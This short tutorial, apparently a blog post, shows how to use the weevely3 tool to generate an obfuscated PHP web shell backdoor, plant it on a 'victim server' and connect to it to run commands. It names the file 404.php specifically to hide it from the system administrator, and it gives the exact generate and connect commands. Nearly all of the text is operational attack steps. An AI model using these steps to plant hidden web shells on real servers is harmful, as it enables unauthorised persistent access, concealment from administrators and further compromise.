Generating A PHP Backdoor with weevely3 - Post Exploitation Stage

Weevely is a web shell designed for remote server administration and penetration testing that can be extended over the network at runtime with more than 30 modules.

It executes remote code via an obfuscated PHP agent located on the compromised HTTP server. It fits both web administration and penetration testing post-exploitation scenarios to maintain access, provide situational awareness, escalate the privileges, and move laterally in the network.

Kali Linux and Parrot OS bundled with the Weevely tool. Open the Terminal and use the following command to generate the PHP backdoor file.

weevely generate password /home/issa/Desktop/404.php

Above command consist of a password and file path of the PHP file. You can use any file name. I have chosen 404.php file name to hide it from the system administrator. If you use file name such as backdoor.php, it will alarm the system administrator.

weevely generate <password> <file path>

It will generate an obfuscated PHP file. Open the file and you will be able to see that the file is obfuscated. You can use reverse engineering methods to inspect the file.

Now you can upload this file to the victim server. If you visit the victim server file after the file upload, you will get a blank page.

To connect to the victim server, open the Terminal and type the following command.

weevely http://127.0.0.1/404.php password

The command used to connect includes the full path URL and the password.

weevely <path to remote server and file> <password>

If you successfully connect to the system, you will be able to see the Target and Session variables.

You can execute various commands to exploit the system using the backdoor.